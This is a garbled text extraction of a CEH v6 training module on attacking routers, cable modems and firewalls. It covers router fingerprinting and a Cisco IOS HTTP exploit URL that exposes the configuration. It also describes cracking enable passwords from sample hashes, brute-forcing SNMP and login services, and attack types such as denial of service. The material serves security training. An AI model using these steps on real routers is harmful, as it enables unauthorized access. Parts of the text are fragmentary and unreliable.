CEHv6 module 35 hacking routers, cable modems, and firewalls

Reproduction is Strictly Prohibited SING: Tool for Identifying the Router SING stands for 'Send ICMP Nasty Garbage’ SING is a command line tool that can send customized ICMP packets Wit

Trang 1

Ethical Hacking and CountermeasuresVersion 6

Module XXXVHacking Routers, Cable Modems and Firewalls

Ethical Hacking and Countermeasures v6

Module XXXV: Hacking Routers, Cable Modems, and Firewalls

Exam 312-50

Trang 2

The attackers make use of Universal Plug and Play (UPnP), a feature which is built-in to home routers UPnP does not use any authentication An attacker can modify the server PCs connected

to the router, open the ports on a victim’s router, and change the router’s settings which are using version 8 or higher of adobe flash The UPnP is turned on with most of the routers by default It should be turned off to prevent from these kinds of attacks

Trang 3

• Analyzing the Router Config

• Cracking the Enable Password

 Analyzing the Router Config

 Cracking the Enable Password

Trang 4

Pen-Testing Tools

Cable Modem Hacking

Bypassing Firewalls

Module Flow

Trang 5

According to searchnetworking.techtarget.com, a router is a device or, in some cases, software in

a computer, that determines the next network point to which a packet should be forwarded toward its destination, in packet-switched networks such as the Internet A router may create or maintain a table of the available routes and their conditions and use this information along with distance and cost algorithms to determine the best route for a given packet

Modems

A modem (Modulator and DEModulator) is a device that receives digital signals and converts it to analog signals, and vice versa The signals from the computer are in digital form and signals that are transferred over the telephone lines are in analog form This conversion is done by the modem Before sending the data, modulation is performed on the data and demodulation is done after receiving the data

Cable Modems

A cable modem is a device that helps user to connect to the computer system with a cable TV line; which has two connections (cable wall outlet and a connection to PC) It comes in internal and external mode, and can receive data at a rate of 1.5Mbps It is attached to standard 10BASE-T Ethernet card in the computer The key components of a cable modem are:

 Microprocessor

 Demodulator/Modulator

 Tuner for fine tuning

 Media access control (MAC) device

Firewall

Trang 6

Hacking Routers

Trang 7

The easiest way to identify a router on network is by using Nmap

Nmap is a vulnerable port scanner which does very accurate OS fingerprinting

Figure: Port Scanning of a Cisco Router

 Identify Router

Source: http://www.securityfocus.com/infocus/1734

Routers can be configured to look just like any other system on the network They can run a web server, an SSH daemon, charger, and they can even appear to be running multiple X servers Common way for identifying the router is to use Nmap Nmap is a port scanner that can give accurate OS fingerprinting Below is the port scan for a typical Cisco router:

Using a login service like Telnet or SSH, connect to the appropriate port by using a standard client A basic Cisco router will look like this:

Trang 8

SING: Tool for Identifying the

Router

SING stands for 'Send ICMP Nasty Garbage’

SING is a command line tool that can send customized ICMP packets

With ICMP packets netmask request of ICMP type 17 can also be included

Routers reply to this type of ICMP packets

Figure: Output of SING Command

 SING: Tool for identifying the Router

Source: http://linux.softpedia.com/

SING stands for 'Send ICMP Nasty Garbage’ SING is the command line tool that sends customized ICMP packets With ICMP packets, netmask request of ICMP type 17 can also be included Routers are the devices that reply to this type of ICMP packets

Features:

 Sends fragmented packets (Linux and BSD)

 Sends monster packets > 65534 (Linux and BSD)

 Sends/reads IP spoofed packets

 Sends/reads Ethernet spoofed packets

 Sends many ICMP Information types in addition to the ECHO REQUEST type sent by default as Address Mask Request, Timestamp, Information Request, Router Solicitation, and Router Advertisement

 Sends many ICMP error types: Redirect, Source Quench, Time Exceeded, Destination Unreach, and Parameter Problem

 Sends to host with loose or strict source routing

 Uses fingerprinting techniques to discover remote OOSS

 Sends ICMP packets emulating certain OSs: Cisco, Solaris, Linux, Shiva, Unix, and Windows

Figure: Output of the SING Command

Trang 9

The router is the most crucial component in the infrastructure of the Internet It is the backbone

of any network infrastructure For this reason, the router is becoming the primary target of any attacker who is trying to intrude or attack a particular network

Vulnerability scanners typically do a great job in identifying known vulnerabilities, but can often miss significant configuration errors For example, Nessus has a list of about 44 community strings to brute-force the SNMP daemon, which may be enough to catch the usage of common default community strings such as public, and private, but cannot take site-specific strings into account that might be in use As with most penetration tests, vulnerability scanners can be a good start, but are simply inadequate in matching the human element that goes into a penetration test.Some vulnerability scanners are:

 X-scan

 SAINT

 Retina

 MBSA

Trang 10

Exploiting Vulnerabilities

in Cisco IOS

Trang 11

HTTP Configuration Arbitrary Administrative Access Vulnerability

Arbitrary commands can be executed on remote Cisco router by a request through HTTP as in:

/level/$NUMBER/exec/show/config/cr

$NUMBER is an integer between 16 and 99

An attacker can use this to cut down network access and can even lock user out of router

This vulnerability can yield full remote administrative control of the affected router

HTTP Configuration Arbitrary Administrative Access Vulnerability (cont’d)

The hacker opens its browser and targets it to the vulnerable router

It will come up like:

Figure : Cisco Router HTTP Basic Authentication Prompt

After Clicking “cancel” button, pen tester enters URL

http://10.0.1.252/level/99/exec/show/config in address bar This will display startup configuration of device

How the router is configured, other interfaces, the Access Control Lists

Trang 12

• Clear Text- enable password

• Vigenere- enable password 7 104B0718071B17

Use getpass to reverse hash into plain text

Disable the web configuration interface completely

Figure: Cisco Router HTTP Basic Authentication Prompt

Trang 13

After clicking the Cancel button, the pen tester enters the following URL into the address bar.http://10.0.1.252/level/99/exec/show/config, and is presented with the startup configuration of the device.

Figure: Cisco Router Config DisplayedConfiguration of the target router can be seen in the web browser The configuration of router, interfaces, Access Control List (ACLs), and SNMP community string can be seen To represent password in Config file IOS, any of the three methods given below are used:

 Clear Text- enable password

 Vigenere- enable password 7 104B0718071B17

 MD5 - enable secret 5 $1$yOMG$38ZIcsEmMaIjsCyQM6hya0

In the example, the network administrator chose Vigenere- which is an easily reversed ecryption scheme This ecryption scheme can be easily cracked with the help of the Getpass Tool

Trang 14

Figure: Decrypting a Vigenere PasswordAfter cracking the password, the pen tester logs in via telnet and gains complete administrative control on the router.

Trang 15

Brute-Forcing Services

Trang 16

Scanner: ADMsnmp

ADMsnmp is an snmpd audit scanner

ADMsnmp can brute force the snmp community name (with a wordfile)

or make a wordfile list derived from the hostname

ADMsnmp can report to you all valid community names found and inform you if writable access to the MIB has been attained

Figure: Management Information Base

ADMsnmp (cont’d)

Now it is known that device is the router and running Cisco IOS

Use the router to send its config file to the desired system using TFTP

Trang 17

 Scanner: ADMsnmp

Source: http://www.freshports.org/security/ADMsnmp/

ADMsnmp is a snmpd audit scanner ADMsnmp can brute force the snmp community name (with

a word file) or make a word file list derived from the hostname ADMsnmp can report all valid community names found and inform you if writable access to the MIB has been attained

Figure: ADMsnp Guessing a Read/Write Community StringThe “send setrequest” string reveals that the user has gained Read/Write privileges on the device

An attacker reads the MIB (Management Information Database) after obtaining a higher level of the privilege

After identifying that the device is router and running Cisco IOS, the attacker will send the

config file to his/her system through TFTP, using the following command:

Trang 18

Solarwinds MIB Browser

Solarwinds MIB Browser is used when SNMP is the only mechanism for accessing device

With Solarwinds, MIB can be browsed

It contains the vendor's standard MIBs for an astounding number of different operating systems and devices

One can set several configuration items using the Cisco generic MIB

 SolarWinds MIB Browser

Source: http://www.solarwinds.com/products/toolsets/MIBBrowser.aspx

The MIB Browser utilizes SolarWinds extensive MIB (Management Information Base) database of more than a thousand standard and proprietary MIBs It is a core fundamental tool for network engineers It allows an engineer to query a remote device for software and hardware configurations via SNMP It also allows an engineer to make changes to the remote device The remote device could be a router, switch, hub, server, firewall, or any other device that supports SNMP

Solarwinds MIB Browser is used when SNMP is the only mechanism for accessing the device With Solarwinds, MIB can be browsed It contains the vendor's standard MIBs for an astounding number of different operating systems and devices One can set several configuration items using the Cisco generic MIB

Trang 19

Brute-Forcing Login Services

Brute-forcing login Services yield positive results for the pen tester

Before attacking the router, determine whether it is using extended authentication like Tacacs or Radius

If device prompts for username, then it is using some kind of authentication mechanism

With standard telnet, client can know whether authentication is passed or not

Tools that are used for Brute-force are:

 Brute-Forcing Login Services

Before brute-forcing login services, identify whether a router has any authentication techniques such as Tacacs or Radius Using a standard Telnet client, you can connect a router to other system

in a network to check whether authentication is conceded to that system or not

When the client establishes a connection and the device in use prompts for username, then the device is said to be installed with some additional authentication mechanisms With the implementation of Tacacs, brute-forcing becomes more difficult and a pen tester has to guess both the username and password instead of guessing only the password

Trang 20

Source: http://securitytnt.com/hydra/#more-197

Hydra is a paralyzed login cracker that supports numerous protocols to attack Hydra brute forces the following: FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, Socks5, and PCNFS

Trang 21

Analyzing the Router Config

With the Brute-Force, you can access the router and see the config file

Config files in router gives a lot of information to penetration testers

Figure: Router Config file

Using Config, attackers can:

Identify new targets

Identify sensitive system

Identify new network by analyzing ACLs

Learn passwords

Analyzing the Router Config

(cont’d)

Figure: Router Config file

 Analyzing the Router Config

Once the router is brute forced, the config file can be accessed with ease Attackers can use the information gained from the config file to:

 Find the new targets

 Find sensitive information

 Identify networks by analyzing ACLs

 Learn passwords

A sample router configuration looks like this:

Trang 24

Cracking the Enable Password

Dictionary attack can be used to crack the enable password

Password can be cracked using the following tools:

• John the Ripper - It is put in an /etc/shadow file

• Cain and Abel – It is capable of conducting both brute-force and dictionary attacks on Cisco MD5 hashes

After cracking password, Pen tester can attempt to log into device, can completely disable

an ACL, and get router config information

Once the pen tester is logged into router, he tries to know what other systems he can access

Pen tester uses both traceroute and telnet from router to explore internal network

 Cracking the Enable Password

A password is stored in the form of MD5 hash A dictionary attack can be used to crack the enable password with the help of the following tools:

 John the Ripper

 Cain and Abel

Cain and Abel perform both brute-force and dictionary attacks on Cisco MD5 hashes

Figure: Cain and Abel

Trang 25

Cain and Abel can figure out enable passwords After getting the sensitive information, an attacker can log into the device

An attacker can add his/her own rule that allows logging in or disabling the ACL, which prevents the direct logging Before modifying anything in router, analyze the router config

Trang 26

Attacking Router

Trang 27

• Interrupt communications by dropping or misrouting packets passing through the router

• Completely disable the router and its network

• Compromise other routers in the network and possibly the neighboring networks

• Observe and log both incoming and outgoing traffic

• May avoid firewalls and Intrusion Detection Systems

• Forward any kind of traffic to the compromised network

If an intruder can acquire control over

a router, he/she can:

Implications of a Router Attack

Router is considered to be a crucial component of a network

 Implications of a Router Attack

The router is a crucial network component It is the framework/backbone of any network infrastructure This is the reason behind the router becoming the primary target of any attacker trying to intrude or attack a particular network If an intruder takes control over the router, the network where the router is placed can be subjected to various types of attacks The possible attacks are as follows:

 Gaining knowledge about all the possible vulnerabilities in the network

 Interrupting communication by dropping or misrouting packets passing through the router

 Completely disabling the router and its network

 Compromising other routers in the network and possibly also the neighboring networks

 Monitoring and recording logs of the incoming and outgoing network traffic

 Avoiding firewalls and intrusion detection systems

 Forwarding any kind of traffic to the compromised network

Trang 28

Types of Router Attacks

Denial of Service attack

Packet mistreating attacks

Routing table poisoning

Flooding

Hit-and-run attacks

Persistent attacks

Router Attack Topology

 Types of Router Attacks

The most common and prevalent router attacks are enlisted below:

1 Denial-of-Service Attacks

2 Packet Mistreating Attacks

3 Routing table poisoning

Trang 30

Denial of Service (DoS)

A DoS attack may lead to:

• Attempt to utilize the bandwidth capacity of the router’s network

 Denial-of-Service (DoS) Attacks

Using a Denial-of-Service (DoS) attack, an attacker overloads the resources and makes it inaccessible, thus making the router unusable for network traffic If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine by flooding the router, accomplishing a Denial-of-Service attack

The attacker floods a network with malicious packet, thus preventing authorized network traffic Once the attacker is successful in carrying out a DoS attack, he/she can also maliciously modify configuration information or routing information

A DoS attack may lead to:

1 Destruction: These attacks damage the capability of the router to operate

2 Resource Utilization: These attacks are achieved by overflowing the router with numerous open connections at the same time

3 Bandwidth Consumption: These attacks are attempted to utilize the bandwidth’s capacity of the router’s network

Trang 31

Packet “Mistreating” Attacks

Attacker acquires an actual data packet and mistreats it

 Packet “Mistreating” Attacks

In these types of attacks, the compromised router would mishandle or mistreat packets resulting

in congestion, etc These attacks are very complicated to detect, for they have restricted effectiveness compared to the routing table poisoning and DoS attacks since the attacks are confined to a part of the network than the whole network

The attacker carrying out a packet mistreating attack might acquire an actual data packet and mistreat it The malicious packet would lead to:

 Denial-of-Service – This can be caused indirectly by directing an irrepressible amount of packet to the victim’s address, thus making the victim router and its network inaccessible for regular traffic

 Congestion – It happens when packets are directed towards a wrong route with heavily flooded links of a network

 Lowering of Connection Throughput – The attacker carrying out a packet mistreating attack can decrease throughput by preventing TCP packets from broadcasting further The victim router sensing congestion would lower the sending speed, resulting in a decrease in connection throughput

Tiêu đề	Hacking Routers, Cable Modems, and Firewalls
Trường học	EC-Council
Chuyên ngành	Information Security
Thể loại	training module

Định dạng
Số trang	62
Dung lượng	2,31 MB